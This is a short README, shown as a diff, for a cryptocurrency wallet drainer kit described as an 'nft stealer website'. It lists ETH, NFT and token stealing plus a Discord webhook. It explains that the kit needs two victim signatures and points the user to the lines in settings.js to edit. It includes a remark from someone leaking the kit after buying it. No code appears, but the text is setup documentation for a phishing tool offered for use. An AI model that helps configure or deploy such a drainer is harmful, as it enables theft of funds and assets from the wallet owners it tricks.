Cronos1402/eth-drainer-100-Working/README.md

 # eth-nft-drainer
 nft stealer website example

-Leaking this trash because the seller promises it to be "silent", when it's not and it requires 2x signatures.
-1x signature for tokens to be sent, 1x signature for ETH/NFTS. ​​​​​​​

 Features:
 NFT Stealer
 ETH Stealer
 Token Stealer
 Discord Webhook

-Search for "TUTORIAL" in settings.js you will find all necessary info to change.

-Otherwise here are all the lines
+here are all the lines you need to change in

 Settings.js file -